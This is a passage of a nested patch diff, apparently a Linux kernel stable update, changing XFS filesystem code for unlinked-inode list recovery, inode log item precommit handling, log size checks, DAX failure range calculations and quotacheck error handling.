+@@ -2035,6 +2109,9 @@ xfs_iunlink_remove_inode(
+ 	 */
+ 	error = xfs_iunlink_update_backref(pag, ip->i_prev_unlinked,
+ 			ip->i_next_unlinked);
++	if (error == -ENOLINK)
++		error = xfs_iunlink_reload_next(tp, agibp, ip->i_prev_unlinked,
++				ip->i_next_unlinked);
+ 	if (error)
+ 		return error;
+ 
+@@ -2055,7 +2132,7 @@ xfs_iunlink_remove_inode(
+ 	}
+ 
+ 	ip->i_next_unlinked = NULLAGINO;
+-	ip->i_prev_unlinked = NULLAGINO;
++	ip->i_prev_unlinked = 0;
+ 	return error;
+ }
+ 
+@@ -2235,11 +2312,26 @@ xfs_ifree_cluster(
+ 		 * This buffer may not have been correctly initialised as we
+ 		 * didn't read it from disk. That's not important because we are
+ 		 * only using to mark the buffer as stale in the log, and to
+-		 * attach stale cached inodes on it. That means it will never be
+-		 * dispatched for IO. If it is, we want to know about it, and we
+-		 * want it to fail. We can acheive this by adding a write
+-		 * verifier to the buffer.
++		 * attach stale cached inodes on it.
++		 *
++		 * For the inode that triggered the cluster freeing, this
++		 * attachment may occur in xfs_inode_item_precommit() after we
++		 * have marked this buffer stale.  If this buffer was not in
++		 * memory before xfs_ifree_cluster() started, it will not be
++		 * marked XBF_DONE and this will cause problems later in
++		 * xfs_inode_item_precommit() when we trip over a (stale, !done)
++		 * buffer to attached to the transaction.
++		 *
++		 * Hence we have to mark the buffer as XFS_DONE here. This is
++		 * safe because we are also marking the buffer as XBF_STALE and
++		 * XFS_BLI_STALE. That means it will never be dispatched for
++		 * IO and it won't be unlocked until the cluster freeing has
++		 * been committed to the journal and the buffer unpinned. If it
++		 * is written, we want to know about it, and we want it to
++		 * fail. We can acheive this by adding a write verifier to the
++		 * buffer.
+ 		 */
++		bp->b_flags |= XBF_DONE;
+ 		bp->b_ops = &xfs_inode_buf_ops;
+ 
+ 		/*
+@@ -3544,3 +3636,117 @@ xfs_iunlock2_io_mmap(
+ 	if (ip1 != ip2)
+ 		inode_unlock(VFS_I(ip1));
+ }
++
++/*
++ * Reload the incore inode list for this inode.  Caller should ensure that
++ * the link count cannot change, either by taking ILOCK_SHARED or otherwise
++ * preventing other threads from executing.
++ */
++int
++xfs_inode_reload_unlinked_bucket(
++	struct xfs_trans	*tp,
++	struct xfs_inode	*ip)
++{
++	struct xfs_mount	*mp = tp->t_mountp;
++	struct xfs_buf		*agibp;
++	struct xfs_agi		*agi;
++	struct xfs_perag	*pag;
++	xfs_agnumber_t		agno = XFS_INO_TO_AGNO(mp, ip->i_ino);
++	xfs_agino_t		agino = XFS_INO_TO_AGINO(mp, ip->i_ino);
++	xfs_agino_t		prev_agino, next_agino;
++	unsigned int		bucket;
++	bool			foundit = false;
++	int			error;
++
++	/* Grab the first inode in the list */
++	pag = xfs_perag_get(mp, agno);
++	error = xfs_ialloc_read_agi(pag, tp, &agibp);
++	xfs_perag_put(pag);
++	if (error)
++		return error;
++
++	/*
++	 * We've taken ILOCK_SHARED and the AGI buffer lock to stabilize the
++	 * incore unlinked list pointers for this inode.  Check once more to
++	 * see if we raced with anyone else to reload the unlinked list.
++	 */
++	if (!xfs_inode_unlinked_incomplete(ip)) {
++		foundit = true;
++		goto out_agibp;
++	}
++
++	bucket = agino % XFS_AGI_UNLINKED_BUCKETS;
++	agi = agibp->b_addr;
++
++	trace_xfs_inode_reload_unlinked_bucket(ip);
++
++	xfs_info_ratelimited(mp,
++ "Found unrecovered unlinked inode 0x%x in AG 0x%x.  Initiating list recovery.",
++			agino, agno);
++
++	prev_agino = NULLAGINO;
++	next_agino = be32_to_cpu(agi->agi_unlinked[bucket]);
++	while (next_agino != NULLAGINO) {
++		struct xfs_inode	*next_ip = NULL;
++
++		/* Found this caller's inode, set its backlink. */
++		if (next_agino == agino) {
++			next_ip = ip;
++			next_ip->i_prev_unlinked = prev_agino;
++			foundit = true;
++			goto next_inode;
++		}
++
++		/* Try in-memory lookup first. */
++		next_ip = xfs_iunlink_lookup(pag, next_agino);
++		if (next_ip)
++			goto next_inode;
++
++		/* Inode not in memory, try reloading it. */
++		error = xfs_iunlink_reload_next(tp, agibp, prev_agino,
++				next_agino);
++		if (error)
++			break;
++
++		/* Grab the reloaded inode. */
++		next_ip = xfs_iunlink_lookup(pag, next_agino);
++		if (!next_ip) {
++			/* No incore inode at all?  We reloaded it... */
++			ASSERT(next_ip != NULL);
++			error = -EFSCORRUPTED;
++			break;
++		}
++
++next_inode:
++		prev_agino = next_agino;
++		next_agino = next_ip->i_next_unlinked;
++	}
++
++out_agibp:
++	xfs_trans_brelse(tp, agibp);
++	/* Should have found this inode somewhere in the iunlinked bucket. */
++	if (!error && !foundit)
++		error = -EFSCORRUPTED;
++	return error;
++}
++
++/* Decide if this inode is missing its unlinked list and reload it. */
++int
++xfs_inode_reload_unlinked(
++	struct xfs_inode	*ip)
++{
++	struct xfs_trans	*tp;
++	int			error;
++
++	error = xfs_trans_alloc_empty(ip->i_mount, &tp);
++	if (error)
++		return error;
++
++	xfs_ilock(ip, XFS_ILOCK_SHARED);
++	if (xfs_inode_unlinked_incomplete(ip))
++		error = xfs_inode_reload_unlinked_bucket(tp, ip);
++	xfs_iunlock(ip, XFS_ILOCK_SHARED);
++	xfs_trans_cancel(tp);
++
++	return error;
++}
+diff --git a/fs/xfs/xfs_inode.h b/fs/xfs/xfs_inode.h
+index fa780f08dc8918..85395ad2859c08 100644
+--- a/fs/xfs/xfs_inode.h
++++ b/fs/xfs/xfs_inode.h
+@@ -68,8 +68,21 @@ typedef struct xfs_inode {
+ 	uint64_t		i_diflags2;	/* XFS_DIFLAG2_... */
+ 	struct timespec64	i_crtime;	/* time created */
+ 
+-	/* unlinked list pointers */
++	/*
++	 * Unlinked list pointers.  These point to the next and previous inodes
++	 * in the AGI unlinked bucket list, respectively.  These fields can
++	 * only be updated with the AGI locked.
++	 *
++	 * i_next_unlinked caches di_next_unlinked.
++	 */
+ 	xfs_agino_t		i_next_unlinked;
++
++	/*
++	 * If the inode is not on an unlinked list, this field is zero.  If the
++	 * inode is the first element in an unlinked list, this field is
++	 * NULLAGINO.  Otherwise, i_prev_unlinked points to the previous inode
++	 * in the unlinked list.
++	 */
+ 	xfs_agino_t		i_prev_unlinked;
+ 
+ 	/* VFS inode */
+@@ -81,6 +94,11 @@ typedef struct xfs_inode {
+ 	struct list_head	i_ioend_list;
+ } xfs_inode_t;
+ 
++static inline bool xfs_inode_on_unlinked_list(const struct xfs_inode *ip)
++{
++	return ip->i_prev_unlinked != 0;
++}
++
+ static inline bool xfs_inode_has_attr_fork(struct xfs_inode *ip)
+ {
+ 	return ip->i_forkoff > 0;
+@@ -326,6 +344,9 @@ static inline bool xfs_inode_has_large_extent_counts(struct xfs_inode *ip)
+  */
+ #define XFS_INACTIVATING	(1 << 13)
+ 
++/* Quotacheck is running but inode has not been added to quota counts. */
++#define XFS_IQUOTAUNCHECKED	(1 << 14)
++
+ /* All inode state flags related to inode reclaim. */
+ #define XFS_ALL_IRECLAIM_FLAGS	(XFS_IRECLAIMABLE | \
+ 				 XFS_IRECLAIM | \
+@@ -340,7 +361,7 @@ static inline bool xfs_inode_has_large_extent_counts(struct xfs_inode *ip)
+ #define XFS_IRECLAIM_RESET_FLAGS	\
+ 	(XFS_IRECLAIMABLE | XFS_IRECLAIM | \
+ 	 XFS_IDIRTY_RELEASE | XFS_ITRUNCATED | XFS_NEED_INACTIVE | \
+-	 XFS_INACTIVATING)
++	 XFS_INACTIVATING | XFS_IQUOTAUNCHECKED)
+ 
+ /*
+  * Flags for inode locking.
+@@ -470,7 +491,7 @@ enum layout_break_reason {
+ 	(xfs_has_grpid((pip)->i_mount) || (VFS_I(pip)->i_mode & S_ISGID))
+ 
+ int		xfs_release(struct xfs_inode *ip);
+-void		xfs_inactive(struct xfs_inode *ip);
++int		xfs_inactive(struct xfs_inode *ip);
+ int		xfs_lookup(struct xfs_inode *dp, const struct xfs_name *name,
+ 			   struct xfs_inode **ipp, struct xfs_name *ci_name);
+ int		xfs_create(struct user_namespace *mnt_userns,
+@@ -575,4 +596,13 @@ void xfs_end_io(struct work_struct *work);
+ int xfs_ilock2_io_mmap(struct xfs_inode *ip1, struct xfs_inode *ip2);
+ void xfs_iunlock2_io_mmap(struct xfs_inode *ip1, struct xfs_inode *ip2);
+ 
++static inline bool
++xfs_inode_unlinked_incomplete(
++	struct xfs_inode	*ip)
++{
++	return VFS_I(ip)->i_nlink == 0 && !xfs_inode_on_unlinked_list(ip);
++}
++int xfs_inode_reload_unlinked_bucket(struct xfs_trans *tp, struct xfs_inode *ip);
++int xfs_inode_reload_unlinked(struct xfs_inode *ip);
++
+ #endif	/* __XFS_INODE_H__ */
+diff --git a/fs/xfs/xfs_inode_item.c b/fs/xfs/xfs_inode_item.c
+index ca2941ab6cbcdd..91c847a84e108c 100644
+--- a/fs/xfs/xfs_inode_item.c
++++ b/fs/xfs/xfs_inode_item.c
+@@ -29,6 +29,153 @@ static inline struct xfs_inode_log_item *INODE_ITEM(struct xfs_log_item *lip)
+ 	return container_of(lip, struct xfs_inode_log_item, ili_item);
+ }
+ 
++static uint64_t
++xfs_inode_item_sort(
++	struct xfs_log_item	*lip)
++{
++	return INODE_ITEM(lip)->ili_inode->i_ino;
++}
++
++/*
++ * Prior to finally logging the inode, we have to ensure that all the
++ * per-modification inode state changes are applied. This includes VFS inode
++ * state updates, format conversions, verifier state synchronisation and
++ * ensuring the inode buffer remains in memory whilst the inode is dirty.
++ *
++ * We have to be careful when we grab the inode cluster buffer due to lock
++ * ordering constraints. The unlinked inode modifications (xfs_iunlink_item)
++ * require AGI -> inode cluster buffer lock order. The inode cluster buffer is
++ * not locked until ->precommit, so it happens after everything else has been
++ * modified.
++ *
++ * Further, we have AGI -> AGF lock ordering, and with O_TMPFILE handling we
++ * have AGI -> AGF -> iunlink item -> inode cluster buffer lock order. Hence we
++ * cannot safely lock the inode cluster buffer in xfs_trans_log_inode() because
++ * it can be called on a inode (e.g. via bumplink/droplink) before we take the
++ * AGF lock modifying directory blocks.
++ *
++ * Rather than force a complete rework of all the transactions to call
++ * xfs_trans_log_inode() once and once only at the end of every transaction, we
++ * move the pinning of the inode cluster buffer to a ->precommit operation. This
++ * matches how the xfs_iunlink_item locks the inode cluster buffer, and it
++ * ensures that the inode cluster buffer locking is always done last in a
++ * transaction. i.e. we ensure the lock order is always AGI -> AGF -> inode
++ * cluster buffer.
++ *
++ * If we return the inode number as the precommit sort key then we'll also
++ * guarantee that the order all inode cluster buffer locking is the same all the
++ * inodes and unlink items in the transaction.
++ */
++static int
++xfs_inode_item_precommit(
++	struct xfs_trans	*tp,
++	struct xfs_log_item	*lip)
++{
++	struct xfs_inode_log_item *iip = INODE_ITEM(lip);
++	struct xfs_inode	*ip = iip->ili_inode;
++	struct inode		*inode = VFS_I(ip);
++	unsigned int		flags = iip->ili_dirty_flags;
++
++	/*
++	 * Don't bother with i_lock for the I_DIRTY_TIME check here, as races
++	 * don't matter - we either will need an extra transaction in 24 hours
++	 * to log the timestamps, or will clear already cleared fields in the
++	 * worst case.
++	 */
++	if (inode->i_state & I_DIRTY_TIME) {
++		spin_lock(&inode->i_lock);
++		inode->i_state &= ~I_DIRTY_TIME;
++		spin_unlock(&inode->i_lock);
++	}
++
++	/*
++	 * If we're updating the inode core or the timestamps and it's possible
++	 * to upgrade this inode to bigtime format, do so now.
++	 */
++	if ((flags & (XFS_ILOG_CORE | XFS_ILOG_TIMESTAMP)) &&
++	    xfs_has_bigtime(ip->i_mount) &&
++	    !xfs_inode_has_bigtime(ip)) {
++		ip->i_diflags2 |= XFS_DIFLAG2_BIGTIME;
++		flags |= XFS_ILOG_CORE;
++	}
++
++	/*
++	 * Inode verifiers do not check that the extent size hint is an integer
++	 * multiple of the rt extent size on a directory with both rtinherit
++	 * and extszinherit flags set.  If we're logging a directory that is
++	 * misconfigured in this way, clear the hint.
++	 */
++	if ((ip->i_diflags & XFS_DIFLAG_RTINHERIT) &&
++	    (ip->i_diflags & XFS_DIFLAG_EXTSZINHERIT) &&
++	    (ip->i_extsize % ip->i_mount->m_sb.sb_rextsize) > 0) {
++		ip->i_diflags &= ~(XFS_DIFLAG_EXTSIZE |
++				   XFS_DIFLAG_EXTSZINHERIT);
++		ip->i_extsize = 0;
++		flags |= XFS_ILOG_CORE;
++	}
++
++	/*
++	 * Record the specific change for fdatasync optimisation. This allows
++	 * fdatasync to skip log forces for inodes that are only timestamp
++	 * dirty. Once we've processed the XFS_ILOG_IVERSION flag, convert it
++	 * to XFS_ILOG_CORE so that the actual on-disk dirty tracking
++	 * (ili_fields) correctly tracks that the version has changed.
++	 */
++	spin_lock(&iip->ili_lock);
++	iip->ili_fsync_fields |= (flags & ~XFS_ILOG_IVERSION);
++	if (flags & XFS_ILOG_IVERSION)
++		flags = ((flags & ~XFS_ILOG_IVERSION) | XFS_ILOG_CORE);
++
++	if (!iip->ili_item.li_buf) {
++		struct xfs_buf	*bp;
++		int		error;
++
++		/*
++		 * We hold the ILOCK here, so this inode is not going to be
++		 * flushed while we are here. Further, because there is no
++		 * buffer attached to the item, we know that there is no IO in
++		 * progress, so nothing will clear the ili_fields while we read
++		 * in the buffer. Hence we can safely drop the spin lock and
++		 * read the buffer knowing that the state will not change from
++		 * here.
++		 */
++		spin_unlock(&iip->ili_lock);
++		error = xfs_imap_to_bp(ip->i_mount, tp, &ip->i_imap, &bp);
++		if (error)
++			return error;
++
++		/*
++		 * We need an explicit buffer reference for the log item but
++		 * don't want the buffer to remain attached to the transaction.
++		 * Hold the buffer but release the transaction reference once
++		 * we've attached the inode log item to the buffer log item
++		 * list.
++		 */
++		xfs_buf_hold(bp);
++		spin_lock(&iip->ili_lock);
++		iip->ili_item.li_buf = bp;
++		bp->b_flags |= _XBF_INODES;
++		list_add_tail(&iip->ili_item.li_bio_list, &bp->b_li_list);
++		xfs_trans_brelse(tp, bp);
++	}
++
++	/*
++	 * Always OR in the bits from the ili_last_fields field.  This is to
++	 * coordinate with the xfs_iflush() and xfs_buf_inode_iodone() routines
++	 * in the eventual clearing of the ili_fields bits.  See the big comment
++	 * in xfs_iflush() for an explanation of this coordination mechanism.
++	 */
++	iip->ili_fields |= (flags | iip->ili_last_fields);
++	spin_unlock(&iip->ili_lock);
++
++	/*
++	 * We are done with the log item transaction dirty state, so clear it so
++	 * that it doesn't pollute future transactions.
++	 */
++	iip->ili_dirty_flags = 0;
++	return 0;
++}
++
+ /*
+  * The logged size of an inode fork is always the current size of the inode
+  * fork. This means that when an inode fork is relogged, the size of the logged
+@@ -662,6 +809,8 @@ xfs_inode_item_committing(
+ }
+ 
+ static const struct xfs_item_ops xfs_inode_item_ops = {
++	.iop_sort	= xfs_inode_item_sort,
++	.iop_precommit	= xfs_inode_item_precommit,
+ 	.iop_size	= xfs_inode_item_size,
+ 	.iop_format	= xfs_inode_item_format,
+ 	.iop_pin	= xfs_inode_item_pin,
+diff --git a/fs/xfs/xfs_inode_item.h b/fs/xfs/xfs_inode_item.h
+index bbd836a44ff048..377e060078044e 100644
+--- a/fs/xfs/xfs_inode_item.h
++++ b/fs/xfs/xfs_inode_item.h
+@@ -17,6 +17,7 @@ struct xfs_inode_log_item {
+ 	struct xfs_log_item	ili_item;	   /* common portion */
+ 	struct xfs_inode	*ili_inode;	   /* inode ptr */
+ 	unsigned short		ili_lock_flags;	   /* inode lock flags */
++	unsigned int		ili_dirty_flags;   /* dirty in current tx */
+ 	/*
+ 	 * The ili_lock protects the interactions between the dirty state and
+ 	 * the flush state of the inode log item. This allows us to do atomic
+diff --git a/fs/xfs/xfs_itable.c b/fs/xfs/xfs_itable.c
+index a1c2bcf65d376f..44d603364d5a94 100644
+--- a/fs/xfs/xfs_itable.c
++++ b/fs/xfs/xfs_itable.c
+@@ -80,6 +80,17 @@ xfs_bulkstat_one_int(
+ 	if (error)
+ 		goto out;
+ 
++	/* Reload the incore unlinked list to avoid failure in inodegc. */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked_bucket(tp, ip);
++		if (error) {
++			xfs_iunlock(ip, XFS_ILOCK_SHARED);
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			xfs_irele(ip);
++			return error;
++		}
++	}
++
+ 	ASSERT(ip != NULL);
+ 	ASSERT(ip->i_imap.im_blkno != 0);
+ 	inode = VFS_I(ip);
+diff --git a/fs/xfs/xfs_log.c b/fs/xfs/xfs_log.c
+index d9aa5eab02c3f5..59c982297503c8 100644
+--- a/fs/xfs/xfs_log.c
++++ b/fs/xfs/xfs_log.c
+@@ -639,7 +639,6 @@ xfs_log_mount(
+ 	int		num_bblks)
+ {
+ 	struct xlog	*log;
+-	bool		fatal = xfs_has_crc(mp);
+ 	int		error = 0;
+ 	int		min_logfsbs;
+ 
+@@ -661,53 +660,37 @@ xfs_log_mount(
+ 	mp->m_log = log;
+ 
+ 	/*
+-	 * Validate the given log space and drop a critical message via syslog
+-	 * if the log size is too small that would lead to some unexpected
+-	 * situations in transaction log space reservation stage.
++	 * Now that we have set up the log and it's internal geometry
++	 * parameters, we can validate the given log space and drop a critical
++	 * message via syslog if the log size is too small. A log that is too
++	 * small can lead to unexpected situations in transaction log space
++	 * reservation stage. The superblock verifier has already validated all
++	 * the other log geometry constraints, so we don't have to check those
++	 * here.
+ 	 *
+-	 * Note: we can't just reject the mount if the validation fails.  This
+-	 * would mean that people would have to downgrade their kernel just to
+-	 * remedy the situation as there is no way to grow the log (short of
+-	 * black magic surgery with xfs_db).
++	 * Note: For v4 filesystems, we can't just reject the mount if the
++	 * validation fails.  This would mean that people would have to
++	 * downgrade their kernel just to remedy the situation as there is no
++	 * way to grow the log (short of black magic surgery with xfs_db).
+ 	 *
+-	 * We can, however, reject mounts for CRC format filesystems, as the
++	 * We can, however, reject mounts for V5 format filesystems, as the
+ 	 * mkfs binary being used to make the filesystem should never create a
+ 	 * filesystem with a log that is too small.
+ 	 */
+ 	min_logfsbs = xfs_log_calc_minimum_size(mp);
+-
+ 	if (mp->m_sb.sb_logblocks < min_logfsbs) {
+ 		xfs_warn(mp,
+ 		"Log size %d blocks too small, minimum size is %d blocks",
+ 			 mp->m_sb.sb_logblocks, min_logfsbs);
+-		error = -EINVAL;
+-	} else if (mp->m_sb.sb_logblocks > XFS_MAX_LOG_BLOCKS) {
+-		xfs_warn(mp,
+-		"Log size %d blocks too large, maximum size is %lld blocks",
+-			 mp->m_sb.sb_logblocks, XFS_MAX_LOG_BLOCKS);
+-		error = -EINVAL;
+-	} else if (XFS_FSB_TO_B(mp, mp->m_sb.sb_logblocks) > XFS_MAX_LOG_BYTES) {
+-		xfs_warn(mp,
+-		"log size %lld bytes too large, maximum size is %lld bytes",
+-			 XFS_FSB_TO_B(mp, mp->m_sb.sb_logblocks),
+-			 XFS_MAX_LOG_BYTES);
+-		error = -EINVAL;
+-	} else if (mp->m_sb.sb_logsunit > 1 &&
+-		   mp->m_sb.sb_logsunit % mp->m_sb.sb_blocksize) {
+-		xfs_warn(mp,
+-		"log stripe unit %u bytes must be a multiple of block size",
+-			 mp->m_sb.sb_logsunit);
+-		error = -EINVAL;
+-		fatal = true;
+-	}
+-	if (error) {
++
+ 		/*
+ 		 * Log check errors are always fatal on v5; or whenever bad
+ 		 * metadata leads to a crash.
+ 		 */
+-		if (fatal) {
++		if (xfs_has_crc(mp)) {
+ 			xfs_crit(mp, "AAIEEE! Log failed size checks. Abort!");
+ 			ASSERT(0);
++			error = -EINVAL;
+ 			goto out_free_log;
+ 		}
+ 		xfs_crit(mp, "Log size out of supported range.");
+diff --git a/fs/xfs/xfs_log_recover.c b/fs/xfs/xfs_log_recover.c
+index 05e48523ea400d..affe94356ed14e 100644
+--- a/fs/xfs/xfs_log_recover.c
++++ b/fs/xfs/xfs_log_recover.c
+@@ -2711,7 +2711,9 @@ xlog_recover_iunlink_bucket(
+ 			 * just to flush the inodegc queue and wait for it to
+ 			 * complete.
+ 			 */
+-			xfs_inodegc_flush(mp);
++			error = xfs_inodegc_flush(mp);
++			if (error)
++				break;
+ 		}
+ 
+ 		prev_agino = agino;
+@@ -2719,10 +2721,15 @@ xlog_recover_iunlink_bucket(
+ 	}
+ 
+ 	if (prev_ip) {
++		int	error2;
++
+ 		ip->i_prev_unlinked = prev_agino;
+ 		xfs_irele(prev_ip);
++
++		error2 = xfs_inodegc_flush(mp);
++		if (error2 && !error)
++			return error2;
+ 	}
+-	xfs_inodegc_flush(mp);
+ 	return error;
+ }
+ 
+@@ -2789,7 +2796,6 @@ xlog_recover_iunlink_ag(
+ 			 * bucket and remaining inodes on it unreferenced and
+ 			 * unfreeable.
+ 			 */
+-			xfs_inodegc_flush(pag->pag_mount);
+ 			xlog_recover_clear_agi_bucket(pag, bucket);
+ 		}
+ 	}
+@@ -2806,13 +2812,6 @@ xlog_recover_process_iunlinks(
+ 
+ 	for_each_perag(log->l_mp, agno, pag)
+ 		xlog_recover_iunlink_ag(pag);
+-
+-	/*
+-	 * Flush the pending unlinked inodes to ensure that the inactivations
+-	 * are fully completed on disk and the incore inodes can be reclaimed
+-	 * before we signal that recovery is complete.
+-	 */
+-	xfs_inodegc_flush(log->l_mp);
+ }
+ 
+ STATIC void
+diff --git a/fs/xfs/xfs_mount.h b/fs/xfs/xfs_mount.h
+index 69ddd531963444..9dc0acf7314f6d 100644
+--- a/fs/xfs/xfs_mount.h
++++ b/fs/xfs/xfs_mount.h
+@@ -62,6 +62,7 @@ struct xfs_error_cfg {
+ struct xfs_inodegc {
+ 	struct llist_head	list;
+ 	struct delayed_work	work;
++	int			error;
+ 
+ 	/* approximate count of inodes in the list */
+ 	unsigned int		items;
+@@ -400,6 +401,8 @@ __XFS_HAS_FEAT(nouuid, NOUUID)
+ #define XFS_OPSTATE_WARNED_SHRINK	8
+ /* Kernel has logged a warning about logged xattr updates being used. */
+ #define XFS_OPSTATE_WARNED_LARP		9
++/* Mount time quotacheck is running */
++#define XFS_OPSTATE_QUOTACHECK_RUNNING	10
+ 
+ #define __XFS_IS_OPSTATE(name, NAME) \
+ static inline bool xfs_is_ ## name (struct xfs_mount *mp) \
+@@ -422,6 +425,11 @@ __XFS_IS_OPSTATE(inode32, INODE32)
+ __XFS_IS_OPSTATE(readonly, READONLY)
+ __XFS_IS_OPSTATE(inodegc_enabled, INODEGC_ENABLED)
+ __XFS_IS_OPSTATE(blockgc_enabled, BLOCKGC_ENABLED)
++#ifdef CONFIG_XFS_QUOTA
++__XFS_IS_OPSTATE(quotacheck_running, QUOTACHECK_RUNNING)
++#else
++# define xfs_is_quotacheck_running(mp)	(false)
++#endif
+ 
+ static inline bool
+ xfs_should_warn(struct xfs_mount *mp, long nr)
+@@ -439,7 +447,8 @@ xfs_should_warn(struct xfs_mount *mp, long nr)
+ 	{ (1UL << XFS_OPSTATE_BLOCKGC_ENABLED),		"blockgc" }, \
+ 	{ (1UL << XFS_OPSTATE_WARNED_SCRUB),		"wscrub" }, \
+ 	{ (1UL << XFS_OPSTATE_WARNED_SHRINK),		"wshrink" }, \
+-	{ (1UL << XFS_OPSTATE_WARNED_LARP),		"wlarp" }
++	{ (1UL << XFS_OPSTATE_WARNED_LARP),		"wlarp" }, \
++	{ (1UL << XFS_OPSTATE_QUOTACHECK_RUNNING),	"quotacheck" }
+ 
+ /*
+  * Max and min values for mount-option defined I/O
+diff --git a/fs/xfs/xfs_notify_failure.c b/fs/xfs/xfs_notify_failure.c
+index c4078d0ec108f1..a7daa522e00fe7 100644
+--- a/fs/xfs/xfs_notify_failure.c
++++ b/fs/xfs/xfs_notify_failure.c
+@@ -114,7 +114,8 @@ xfs_dax_notify_ddev_failure(
+ 	int			error = 0;
+ 	xfs_fsblock_t		fsbno = XFS_DADDR_TO_FSB(mp, daddr);
+ 	xfs_agnumber_t		agno = XFS_FSB_TO_AGNO(mp, fsbno);
+-	xfs_fsblock_t		end_fsbno = XFS_DADDR_TO_FSB(mp, daddr + bblen);
++	xfs_fsblock_t		end_fsbno = XFS_DADDR_TO_FSB(mp,
++							     daddr + bblen - 1);
+ 	xfs_agnumber_t		end_agno = XFS_FSB_TO_AGNO(mp, end_fsbno);
+ 
+ 	error = xfs_trans_alloc_empty(mp, &tp);
+@@ -125,8 +126,8 @@ xfs_dax_notify_ddev_failure(
+ 		struct xfs_rmap_irec	ri_low = { };
+ 		struct xfs_rmap_irec	ri_high;
+ 		struct xfs_agf		*agf;
+-		xfs_agblock_t		agend;
+ 		struct xfs_perag	*pag;
++		xfs_agblock_t		range_agend;
+ 
+ 		pag = xfs_perag_get(mp, agno);
+ 		error = xfs_alloc_read_agf(pag, tp, 0, &agf_bp);
+@@ -147,10 +148,10 @@ xfs_dax_notify_ddev_failure(
+ 			ri_high.rm_startblock = XFS_FSB_TO_AGBNO(mp, end_fsbno);
+ 
+ 		agf = agf_bp->b_addr;
+-		agend = min(be32_to_cpu(agf->agf_length),
++		range_agend = min(be32_to_cpu(agf->agf_length) - 1,
+ 				ri_high.rm_startblock);
+ 		notify.startblock = ri_low.rm_startblock;
+-		notify.blockcount = agend - ri_low.rm_startblock;
++		notify.blockcount = range_agend + 1 - ri_low.rm_startblock;
+ 
+ 		error = xfs_rmap_query_range(cur, &ri_low, &ri_high,
+ 				xfs_dax_failure_fn, &notify);
+@@ -210,7 +211,7 @@ xfs_dax_notify_failure(
+ 	ddev_end = ddev_start + bdev_nr_bytes(mp->m_ddev_targp->bt_bdev) - 1;
+ 
+ 	/* Ignore the range out of filesystem area */
+-	if (offset + len < ddev_start)
++	if (offset + len - 1 < ddev_start)
+ 		return -ENXIO;
+ 	if (offset > ddev_end)
+ 		return -ENXIO;
+@@ -222,8 +223,8 @@ xfs_dax_notify_failure(
+ 		len -= ddev_start - offset;
+ 		offset = 0;
+ 	}
+-	if (offset + len > ddev_end)
+-		len -= ddev_end - offset;
++	if (offset + len - 1 > ddev_end)
++		len = ddev_end - offset + 1;
+ 
+ 	return xfs_dax_notify_ddev_failure(mp, BTOBB(offset), BTOBB(len),
+ 			mf_flags);
+diff --git a/fs/xfs/xfs_qm.c b/fs/xfs/xfs_qm.c
+index 18bb4ec4d7c9b4..bd907bbc389cf3 100644
+--- a/fs/xfs/xfs_qm.c
++++ b/fs/xfs/xfs_qm.c
+@@ -422,6 +422,14 @@ xfs_qm_dquot_isolate(
+ 	if (!xfs_dqlock_nowait(dqp))
+ 		goto out_miss_busy;
+ 
++	/*
++	 * If something else is freeing this dquot and hasn't yet removed it
++	 * from the LRU, leave it for the freeing task to complete the freeing
++	 * process rather than risk it being free from under us here.
++	 */
++	if (dqp->q_flags & XFS_DQFLAG_FREEING)
++		goto out_miss_unlock;
++
+ 	/*
+ 	 * This dquot has acquired a reference in the meantime remove it from
+ 	 * the freelist and try again.
+@@ -441,10 +449,8 @@ xfs_qm_dquot_isolate(
+ 	 * skip it so there is time for the IO to complete before we try to
+ 	 * reclaim it again on the next LRU pass.
+ 	 */
+-	if (!xfs_dqflock_nowait(dqp)) {
+-		xfs_dqunlock(dqp);
+-		goto out_miss_busy;
+-	}
++	if (!xfs_dqflock_nowait(dqp))
++		goto out_miss_unlock;
+ 
+ 	if (XFS_DQ_IS_DIRTY(dqp)) {
+ 		struct xfs_buf	*bp = NULL;
+@@ -478,6 +484,8 @@ xfs_qm_dquot_isolate(
+ 	XFS_STATS_INC(dqp->q_mount, xs_qm_dqreclaims);
+ 	return LRU_REMOVED;
+ 
++out_miss_unlock:
++	xfs_dqunlock(dqp);
+ out_miss_busy:
+ 	trace_xfs_dqreclaim_busy(dqp);
+ 	XFS_STATS_INC(dqp->q_mount, xs_qm_dqreclaim_misses);
+@@ -1152,6 +1160,19 @@ xfs_qm_dqusage_adjust(
+ 	if (error)
+ 		return error;
+ 
++	/*
++	 * Reload the incore unlinked list to avoid failure in inodegc.
++	 * Use an unlocked check here because unrecovered unlinked inodes
++	 * should be somewhat rare.
++	 */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked(ip);
++		if (error) {
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			goto error0;
++		}
++	}
++
+ 	ASSERT(ip->i_delayed_blks == 0);
+ 
+ 	if (XFS_IS_REALTIME_INODE(ip)) {
+@@ -1165,6 +1186,7 @@ xfs_qm_dqusage_adjust(
+ 	}
+ 
+ 	nblks = (xfs_qcnt_t)ip->i_nblocks - rtblks;
++	xfs_iflags_clear(ip, XFS_IQUOTAUNCHECKED);
+ 
+ 	/*
+ 	 * Add the (disk blocks and inode) resources occupied by this
+@@ -1311,17 +1333,18 @@ xfs_qm_quotacheck(
+ 		flags |= XFS_PQUOTA_CHKD;
+ 	}
+ 
++	xfs_set_quotacheck_running(mp);
+ 	error = xfs_iwalk_threaded(mp, 0, 0, xfs_qm_dqusage_adjust, 0, true,
+ 			NULL);
+-	if (error) {
+-		/*
+-		 * The inode walk may have partially populated the dquot
+-		 * caches.  We must purge them before disabling quota and
+-		 * tearing down the quotainfo, or else the dquots will leak.
+-		 */
+-		xfs_qm_dqpurge_all(mp);
+-		goto error_return;
+-	}
++	xfs_clear_quotacheck_running(mp);
++
++	/*
++	 * On error, the inode walk may have partially populated the dquot
++	 * caches.  We must purge them before disabling quota and tearing down
++	 * the quotainfo, or else the dquots will leak.
++	 */
++	if (error)
++		goto error_purge;
+ 
+ 	/*
+ 	 * We've made all the changes that we need to make incore.  Flush them
+@@ -1355,10 +1378,8 @@ xfs_qm_quotacheck(
+ 	 * and turn quotaoff. The dquots won't be attached to any of the inodes
+ 	 * at this point (because we intentionally didn't in dqget_noattach).
+ 	 */
+-	if (error) {
+-		xfs_qm_dqpurge_all(mp);
+-		goto error_return;
+-	}
++	if (error)
